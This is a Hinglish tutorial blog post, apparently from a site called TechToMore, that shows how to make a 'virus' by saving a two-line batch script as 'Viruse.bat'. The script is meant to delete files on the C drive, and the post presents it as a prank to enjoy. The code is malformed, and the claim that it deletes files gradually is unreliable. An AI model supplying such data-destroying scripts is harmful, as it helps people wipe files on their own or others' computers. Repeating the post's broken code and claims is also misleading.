Header Ads

ad

PC Me Virus Kese Banate Hai

Hello Friends... aaj hum aapko ye batayenge ki PC me Virus kese banate hai...


                                                  
Friends aapko agar PC me virus banana hai to aapko kuch nahi bas ek software ki jarurat hai. Us software ka name hai "Notepad" Dosto Notepad ek normal software hai jo PC me pehle se hi aata hai.

Friends ye Trick "Notepad++" se bhi use ho sakta hai agar aapke pass "Notepad++" Software nahi hai to niche Downlaod Now button per click kare or "Notepad++" Software download kar le.

                                  Download Now


PC Me Virus Banane Ke Liye Niche Wale Tips Ko Follow Kare...


1. Pehle Notepad ko Open kare.

2. Iss code ko copy kare.

         @Echo off
        Del C: *.* |y


3. Save kar de.
4. File ka name dale "Viruse.bat".
                

                            

5. Aab aapka Virus ban gaya hai.
                          

6. Ye Virus aapki C Drive ki Files ko dhire dhire delete karta Rahega.



Then Enjoy Friends...



 

 





 



  






PC Me Virus Kese Banate Hai PC Me Virus Kese Banate Hai Reviewed by TechToMore on 01:04 Rating: 5

No comments

Recent Posts

Gallery